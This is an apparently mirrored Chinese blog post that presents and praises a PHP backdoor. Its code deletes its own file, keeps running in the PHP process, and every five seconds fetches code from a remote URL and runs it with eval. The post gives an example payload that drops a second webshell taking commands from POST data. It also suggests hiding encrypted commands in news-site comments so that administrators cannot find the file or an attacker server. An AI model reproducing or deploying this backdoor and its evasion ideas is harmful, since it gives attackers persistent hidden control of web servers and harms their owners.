zoukankan      html  css  js  c++  java
  • 捡了一个非常淫荡的PHP后门,给跪了

    <?php

    unlink($_SERVER['SCRIPT_FILENAME']);

    ignore_user_abort(true);

    set_time_limit(0);

    $remote_file = 'http://xxx/xxx.txt';

    while($code = file_get_contents($remote_file)){

    @eval($code);

    sleep(5);

    };

    ?>

    后门的代码第一行删除自身,然后驻留在后台内存里(关于ignore_user_abort函数,百度一下),等待外部链接

    在xxx.txt中写入你的后门代码,访问后就会删除自己并循环执行txt的代码 


    例如txt里面写了一句这样的代码 file_put_contents('./1.php',"<?php @eval($_POST[cmd])'"?>");


    这样就会在目录下又生成一个木马


    如果对方写了是执行命令 。。。

    这段代码纯粹变成了一个等待命令的木马。。


    而且管理员检查木马文件的时候  都找不到。。。


    因为文件已经删除了



    木马却注入在php-fpm内


    sleep(5);  五秒就去远程读取一下指令。。。

    ........

    打算将代码修改一下,加一些正则,去163某一篇新闻的评论里读取预先设定的恶意代码。。。hehe。。。


    黑客连服务器都省了。。。



    黑客只需要去网易新闻评论窗口内写入自己的代码就行


    怕别人看懂?


    直接加密


    采用对称加密算法。。没有秘钥 谁也看不懂啥意思


    秘钥在这段后门里面写着


    所以非常安全



    活生生就是一个远控木马啊!!

    这么好的思路,给作者一个大赞

  • 相关阅读:
    面试题
    面向切面编程 AOP
    matlab提取wind底层数据库操作
    tensorflow(4):神经网络框架总结
    tensorflow(3):神经网络优化(ema,regularization)
    tensorflow(2):神经网络优化(loss,learning_rate)
    tensorflow(1) 基础: 神经网络基本框架
    在anaconda中安装tensorflow
    anaconda利用pip安装module
    python(10): xlsxwriter模块
  • 原文地址:https://www.cnblogs.com/h4ck0ne/p/5154562.html
Copyright © 2011-2022 走看看